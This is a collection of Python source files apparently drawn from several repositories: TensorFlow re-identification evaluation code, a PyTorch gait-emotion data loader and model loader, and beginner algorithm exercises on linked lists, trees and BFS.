dataset, attention, manner, time_steps, temperature = settings[0], settings[1], settings[3], int(settings[4]), float(settings[5])
settings = RN_dir.split('pre_')
Model = settings[1]
print(' ## Dataset: %s\n ## Attention: %s\n ## Re-ID Manner: %s\n ## Sequence Length: %s\n ## Tempearture: %s\n ## Pretext Task: %s\n' %
(dataset, attention, manner, str(time_steps), str(temperature), Model))
evaluate_reid('./Models/CAGEs_RN_models/' + RN_dir)
except:
print('Running failed. Please check out your parameters.')
def get_new_train_batches(targets, sources, batch_size):
if len(targets) < batch_size:
yield targets, sources
else:
for batch_i in range(0, len(sources) // batch_size):
start_i = batch_i * batch_size
sources_batch = sources[start_i:start_i + batch_size]
targets_batch = targets[start_i:start_i + batch_size]
yield targets_batch, sources_batch
def evaluate_reid(model_dir):
# print('Print the Validation Loss and Rank-1 Accuracy for each testing bacth: ')
global batch_size, dataset, manner, IAS_test
X = np.load(model_dir + '/val_X.npy')
y = np.load(model_dir + '/val_y.npy')
print(X.shape, y.shape)
if dataset == 'IAS':
X_2 = np.load(model_dir + '/val_2_X.npy')
y_2 = np.load(model_dir + '/val_2_y.npy')
if dataset == 'BIWI':
classes = [i for i in range(28)]
elif dataset == 'KGBD':
classes = [i for i in range(164)]
elif dataset == 'IAS':
classes = [i for i in range(11)]
elif dataset == 'KinectReID':
classes = [i for i in range(71)]
elif dataset == 'KS20':
classes = [i for i in range(20)]
checkpoint = model_dir + "/trained_model.ckpt"
loaded_graph = tf.get_default_graph()
from sklearn.preprocessing import label_binarize
from sklearn.metrics import roc_curve, auc, confusion_matrix
nAUC = 0
def cal_AUC(score_y, pred_y, ps, draw_pic=False):
score_y = np.array(score_y)
pred_y = label_binarize(np.array(pred_y), classes=classes)
# Compute micro-average ROC curve and ROC area
fpr, tpr, thresholds = roc_curve(pred_y.ravel(), score_y.ravel())
roc_auc = auc(fpr, tpr)
y_true = np.argmax(pred_y, axis=-1)
y_pred = np.argmax(score_y, axis=-1)
print('\n### Re-ID Confusion Matrix: ')
print(confusion_matrix(y_true, y_pred))
return roc_auc
if draw_pic:
fig = plt.figure()
lw = 2
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic: ' + ps)
plt.legend(loc="lower right")
fig.savefig('30 epoch ROC')
plt.close()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint + '.meta')
loader.restore(sess, checkpoint)
X_input = loaded_graph.get_tensor_by_name('X_input:0')
y_input = loaded_graph.get_tensor_by_name('y_input:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
pred = loaded_graph.get_tensor_by_name('add_1:0')
cost = loaded_graph.get_tensor_by_name('new_train/Mean:0')
accuracy = loaded_graph.get_tensor_by_name('new_train/Mean_1:0')
correct_num = 0
total_num = 0
rank_acc = {}
ys = []
preds = []
accs = []
cnt = 0
Rank_1 = 0
if (dataset == 'IAS' and IAS_test == 'A') or dataset != 'IAS':
if dataset == 'IAS':
print('### Validation Results on IAS-A: ')
if manner == 'sc':
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y, X, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
accs.append(acc)
cnt += 1
for i in range(y_batch.shape[0]):
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(pre[i], -K)[-K:]
if np.argmax(y_batch[i]) in t:
rank_acc[K] += 1
correct_num += acc * batch_size
total_num += batch_size
print(
'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
.format(cnt,
loss,
acc,
))
for K in rank_acc.keys():
rank_acc[K] /= total_num
total_acc = correct_num / total_num
Rank_1 = total_acc
# print('Rank-1 Accuracy: %f' % total_acc)
nAUC = cal_AUC(score_y=preds,pred_y=ys, ps='nAUC')
else:
all_frame_preds = []
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y, X, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
all_frame_preds.extend(pre)
accs.append(acc)
cnt += 1
# for i in range(y_batch.shape[0]):
# for K in range(1, len(classes) + 1):
# if K not in rank_acc.keys():
# rank_acc[K] = 0
# t = np.argpartition(pre[i], -K)[-K:]
# if np.argmax(y_batch[i]) in t:
# rank_acc[K] += 1
# correct_num += acc * batch_size
# total_num += batch_size
# print(
# 'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
# .format(cnt,
# loss,
# acc,
# ))
# for K in rank_acc.keys():
# rank_acc[K] /= total_num
sequence_pred_correct = 0
sequence_num = 0
sequence_preds = []
sequence_ys = []
rank_acc = {}
for k in range(len(all_frame_preds) // time_steps):
sequence_labels = np.argmax(y[k * time_steps: (k + 1) * time_steps], axis=1)
# print(sequence_labels)
if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
temp_pred = np.average(frame_predictions, axis=0)
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(temp_pred, -K)[-K:]
if sequence_labels[0] in t:
rank_acc[K] += 1
if sequence_pred == sequence_labels[0]:
sequence_pred_correct += 1
sequence_num += 1
sequence_ys.append(sequence_labels[0])
aver = np.average(frame_predictions, axis=0)
sequence_preds.append(aver)
for K in rank_acc.keys():
rank_acc[K] /= sequence_num
seq_acc_t = sequence_pred_correct / sequence_num
# total_acc = correct_num / total_num
# print('(Frame) Rank-1 Accuracy: %f' % total_acc)
Rank_1 = seq_acc_t
sequence_ys = label_binarize(sequence_ys, classes=classes)
# cal_AUC(score_y=preds,pred_y=ys, ps='nAUC')
nAUC = cal_AUC(score_y=sequence_preds, pred_y=sequence_ys, ps='nAUC')
print('### Rank-n Accuracy: ')
print(rank_acc)
print('### Rank-1 Accuracy: %f' % Rank_1)
print('### nAUC: ' + str(nAUC))
if dataset == 'IAS' and IAS_test == 'B':
print('### Validation Results on IAS-B: ')
# IAS-B
if manner == 'sc':
correct_num = 0
total_num = 0
rank_acc = {}
ys = []
preds = []
accs = []
cnt = 0
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y_2, X_2, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
accs.append(acc)
cnt += 1
for i in range(y_batch.shape[0]):
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(pre[i], -K)[-K:]
if np.argmax(y_batch[i]) in t:
rank_acc[K] += 1
correct_num += acc * batch_size
total_num += batch_size
# print(
# 'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
# .format(cnt,
# loss,
# acc,
# ))
for K in rank_acc.keys():
rank_acc[K] /= total_num
total_acc = correct_num / total_num
Rank_1 = total_acc
# print('Rank-1 Accuracy: %f' % total_acc)
nAUC = cal_AUC(score_y=preds, pred_y=ys, ps='nAUC')
else:
all_frame_preds = []
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y_2, X_2, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
accs.append(acc)
all_frame_preds.extend(pre)
cnt += 1
# for i in range(y_batch.shape[0]):
# for K in range(1, len(classes) + 1):
# if K not in rank_acc.keys():
# rank_acc[K] = 0
# t = np.argpartition(pre[i], -K)[-K:]
# if np.argmax(y_batch[i]) in t:
# rank_acc[K] += 1
# # correct_num += acc * batch_size
# total_num += batch_size
# print(
# 'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
# .format(cnt,
# loss,
# acc,
# ))
# for K in rank_acc.keys():
# rank_acc[K] /= total_num
sequence_pred_correct = 0
sequence_num = 0
sequence_preds = []
sequence_ys = []
rank_acc = {}
for k in range(len(all_frame_preds) // time_steps):
sequence_labels = np.argmax(y_2[k * time_steps: (k + 1) * time_steps], axis=1)
if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
temp_pred = np.average(frame_predictions, axis=0)
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(temp_pred, -K)[-K:]
if sequence_labels[0] in t:
rank_acc[K] += 1
if sequence_pred == sequence_labels[0]:
sequence_pred_correct += 1
sequence_num += 1
sequence_ys.append(sequence_labels[0])
aver = np.average(frame_predictions, axis=0)
sequence_preds.append(aver)
for K in rank_acc.keys():
rank_acc[K] /= sequence_num
seq_acc_t = sequence_pred_correct / sequence_num
Rank_1 = seq_acc_t
# total_acc = correct_num / total_num
# print('(Frame) Rank-1 Accuracy: %f' % total_acc)
# print('Rank-1 Accuracy: %f' % seq_acc_t)
sequence_ys = label_binarize(sequence_ys, classes=classes)
# cal_AUC(score_y=preds, pred_y=ys, ps='nAUC')
nAUC = cal_AUC(score_y=sequence_preds, pred_y=sequence_ys, ps='nAUC')
print('### Rank-n Accuracy: ')
print(rank_acc)
print('### Rank-1 Accuracy: %f' % Rank_1)
print('### nAUC: ' + str(nAUC))
if __name__ == '__main__':
tf.app.run()
``` |
{
"source": "1suancaiyu/STEP",
"score": 2
} |
#### File: classifier_stgcn_real_and_synth/utils/loader.py
```python
import h5py
import os
import numpy as np
import tensorflow as tf
from sklearn.model_selection import train_test_split
from utils import common
# torch
import torch
from torchvision import datasets, transforms
def load_data(_path, _ftype_real, _ftype_synth, coords, joints, cycles=3):
file_feature_real = os.path.join(_path, 'features' + _ftype_real + '.h5')
ffr = h5py.File(file_feature_real, 'r')
file_label_real = os.path.join(_path, 'labels' + _ftype_real + '.h5')
flr = h5py.File(file_label_real, 'r')
file_feature_synth = os.path.join(_path, 'features' + _ftype_synth + '.h5')
ffs = h5py.File(file_feature_synth, 'r')
file_label_synth = os.path.join(_path, 'labels' + _ftype_synth + '.h5')
fls = h5py.File(file_label_synth, 'r')
data_list = []
num_samples_real = len(ffr.keys())
num_samples_synth = len(ffs.keys())
num_samples = num_samples_real + num_samples_synth
time_steps = 0
labels_real = np.empty(num_samples_real)
labels_synth = np.empty(num_samples_synth)
for si in range(num_samples_real):
ffr_group_key = list(ffr.keys())[si]
data_list.append(list(ffr[ffr_group_key])) # Get the data
time_steps_curr = len(ffr[ffr_group_key])
if time_steps_curr > time_steps:
time_steps = time_steps_curr
labels_real[si] = flr[list(flr.keys())[si]][()]
for si in range(num_samples_synth):
ffs_group_key = list(ffs.keys())[si]
data_list.append(list(ffs[ffs_group_key])) # Get the data
time_steps_curr = len(ffs[ffs_group_key])
if time_steps_curr > time_steps:
time_steps = time_steps_curr
labels_synth[si] = fls[list(fls.keys())[si]][()]
labels = np.concatenate((labels_real, labels_synth), axis=0)
data = np.empty((num_samples, time_steps*cycles, joints*coords))
for si in range(num_samples):
data_list_curr = np.tile(data_list[si], (int(np.ceil(time_steps / len(data_list[si]))), 1))
for ci in range(cycles):
data[si, time_steps * ci:time_steps * (ci + 1), :] = data_list_curr[0:time_steps]
data = common.get_affective_features(np.reshape(data, (data.shape[0], data.shape[1], joints, coords)))[:, :, :48]
data_train, data_test, labels_train, labels_test = train_test_split(data, labels, test_size=0.1)
return data, labels, data_train, labels_train, data_test, labels_test
def scale(_data):
data_scaled = _data.astype('float32')
data_max = np.max(data_scaled)
data_min = np.min(data_scaled)
data_scaled = (_data-data_min)/(data_max-data_min)
return data_scaled, data_max, data_min
# descale generated data
def descale(data, data_max, data_min):
data_descaled = data*(data_max-data_min)+data_min
return data_descaled
def to_categorical(y, num_classes):
""" 1-hot encodes a tensor """
return np.eye(num_classes, dtype='uint8')[y]
class TrainTestLoader(torch.utils.data.Dataset):
def __init__(self, data, label, joints, coords, num_classes):
# data: N C T J
self.data = np.reshape(data, (data.shape[0], data.shape[1], joints, coords, 1))
self.data = np.moveaxis(self.data, [1, 2, 3], [2, 3, 1])
# load label
self.label = label
self.N, self.C, self.T, self.J, self.M = self.data.shape
def __len__(self):
return len(self.label)
def __getitem__(self, index):
# get data
data_numpy = np.array(self.data[index])
label = self.label[index]
# processing
# if self.random_choose:
# data_numpy = tools.random_choose(data_numpy, self.window_size)
# elif self.window_size > 0:
# data_numpy = tools.auto_pading(data_numpy, self.window_size)
# if self.random_move:
# data_numpy = tools.random_move(data_numpy)
return data_numpy, label
``` |
{
"source": "1suancaiyu/take_an_emotion_walk",
"score": 2
} |
#### File: take_an_emotion_walk/models/model_loader.py
```python
import sys
import torch
## default weights paths
DGNN_WEIGHTS_PATH = "weights/dgnn_weights.pt"
STGCN_WEIGHTS_PATH = "weights/stgcn_500_5.pt"
def load_stgcn(weights_path):
print("Loading stgcn...")
sys.path.append("models/stgcn/")
import st_gcn
model = st_gcn.Model(3, 4, [])
model.load_state_dict(torch.load(STGCN_WEIGHTS_PATH))
model.cuda()
model.double()
return model
def load_dgnn(weights_path):
print("Loading dgnn...")
sys.path.append("models/dgnn/")
import dgnn
model = dgnn.Model()
model.cuda()
model.load_state_dict(torch.load(DGNN_WEIGHTS_PATH))
return model
# def load_taew(weights_path):
# TODO
# print("Loading taew...")
# sys.path.append("models/taew/")
# import hap
# model = hap.HAPPY()
# model.cuda()
# loaded_vars = torch.load(weights_path)
# model.load_state_dict(loaded_vars['model_dict'])
# model_GRU_h_enc = loaded_vars['h_enc']
# model_GRU_h_dec1 = loaded_vars['h_dec1']
# model_GRU_h_dec = loaded_vars['h_dec']
# return model
``` |
{
"source": "1tanwang/graph-and-graph-algorithms",
"score": 4
} |
#### File: algorithms/bfs-dfs/BFS.py
```python
from graph import Graph, read_adj_list
def bfs_shortest_path(graph, start, goal):
queue = [(start, [start])]
while queue:
(vertex, path) = queue.pop(0)
for next in set(graph.get_neighbors(vertex)) - set(path):
if next == goal:
return path + [next]
else:
queue.append((next, path + [next]))
return "no path from {} to {}".format(start, goal)
def bfs_connected_components(graph, start):
queue, visited = [start], set()
while queue:
vertex = stack.pop(0)
if vertex not in visited:
visited.add(vertex)
stack += set(graph.get_neighbors(vertex)) - visited
return visited
``` |
{
"source": "1ta/study_python",
"score": 4
} |
#### File: sun/codingbat/logic_2.py
```python
def make_bricks(small, big, goal):
if goal > small + 5*big:
return False
if goal%5 <= small:
return True
else:
return False
def lone_sum(a, b, c):
sum = 0
if a != b and a != c: sum += a
if b != a and b != c: sum += b
if c != a and c != b: sum += c
return sum
def lucky_sum(a, b, c):
sum = 0
if a != 13:
sum += a
if b != 13:
sum += b
if c != 13:
sum += c
return sum
def make_chocolate(small, big, goal):
if goal > small + 5*big:
return -1
if goal%5 > small:
return -1
if goal/5 > big:
return goal-big*5
else:
return goal%5
```
#### File: sun/online_practice/remove_lianbiao.py
```python
class Solution:
"""
@param head: The first node of linked list.
@param n: An integer.
@return: The head of linked list.
"""
def removeNthFromEnd(self, head, n):
def findend(head):
end = head
count = 1
while end.next != None:
end = end.next
count = count+1
return count
def removenode(head,m):
if head.next is None:
return None
if m == 1 :
return head.next
current_no = 2
lh = head
lt = head
rh = head.next
while current_no < m:
lt = rh
rh = rh.next
current_no += 1
lt.next = rh.next
return head
l = findend(head)
m = l+1-n
r = removenode(head,m)
return r
```
#### File: sun/online_practice/subtree.py
```python
class Solution:
# @param T1, T2: The roots of binary tree.
# @return: True if T2 is a subtree of T1, or false.
def isSubtree(self, T1, T2):
# write your code here
def match_tree(T1,T2):
if T1 is None and T2 is None:
return True
if T1.val != T2.val:
return False
return match_tree(T1.left,T2.left) and match_tree(T1.right,T2.right)
def subtree(T1, T2):
if T1 is None:
return False
# if T1.val == T2.val:
if match_tree(T1,T2):
return True
return subtree(T1.left,T2) or subtree(T1.right,T2)
if T2 is None:
return False
return subtree(T1,T2)
```
#### File: sun/practice/24dian.py
```python
import math
nums = input("Enter 4 numbers(split with common):")
l=[]
for i in nums.split(","):
l.append(int(i))
def multiply(a,b):
return a*b
def plus(a,b):
return a+b
def minus(a,b):
return a-b
def divise(a,b):
return a*1.0/b
op = {
'*': multiply,
'+': plus,
'-': minus,
'/': divise
}
ops = ['*','+','-','/']
```
#### File: sun/practice/binarytree(pre+in).py
```python
class Solution:
"""
@param preorder : A list of integers that preorder traversal of a tree
@param inorder : A list of integers that inorder traversal of a tree
@return : Root of a tree
"""
def buildTree(self, preorder, inorder):
def genTree(preorder,inorder):
if len(preorder)==0:
return None
root_val = preorder[0]
root = TreeNode(root_val)
n = inorder.index(root_val)
left_preorder = preorder[1:n+1]
left_inorder = inorder[:n]
right_preorder = preorder[n+1:]
right_inorder= inorder[n+1:]
if len(left_preorder) > 0:
root.left = genTree(left_preorder, left_inorder)
if len(right_preorder) > 0:
root.right = genTree(right_preorder, right_inorder)
return root
root = genTree(preorder, inorder)
return root
```
#### File: sun/practice/large_4_num.py
```python
class Solution:
"""
@param nums: A list of integers
@return: An integer denote the sum of maximum subarray
"""
def maxSubArray(self, nums):
if len(nums)< 4:
return sum(nums)
else:
cache=[]
for i in range(len(nums)-3):
sum_num = nums[i]+nums[i+1]+nums[i+2]+nums[i+3]
cache.append(sum_num)
return max(cache)
print (Solution().maxSubArray([-1,4]))
```
#### File: sun/practice/longest_word_2.py
```python
class Solution:
# @param dictionary: a list of strings
# @return: a list of strings
def longestWords(self, dictionary):
cache = []
maxlength = 0
for word in dictionary:
l = len(word)
if l >= maxlength:
cache = []
maxlength = l
cache.append(word)
elif l == maxlength:
cache.append(word)
return cache
print(Solution().longestWords(["apped","apdoap","pajdnd","adjdnd"]))
```
#### File: sun/practice/longest_word.py
```python
class Solution:
# @param dictionary: a list of strings
# @return: a list of strings
def longestWords(self, dictionary):
def word_len_list(dictionary):
wd_list =[]
for word in dictionary:
wd_list.append(len(word))
return max(wd_list)
def find_word(dictionary):
result = []
for word in dictionary:
if len(word) == word_len_list(dictionary):
result.append(word)
return result
return find_word(dictionary)
print(Solution().longestWords(["apped","apdoap","pajdnd","adjdnd"]))
```
#### File: sun/practice/replace_blank.py
```python
class Solution:
# @param {char[]} string: An array of Char
# @param {int} length: The true length of the string
# @return {int} The true length of new string
def replaceBlank(self, string, length):
new_len = length
if string == None:
return None
for str_1 in string:
if str_1 == " ":
new_len += 2
for i in range(new_len):
if string[i] == " ":
string.remove(" ")
string.insert(i,'0')
string.insert(i,'2')
string.insert(i,'%')
return new_len
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.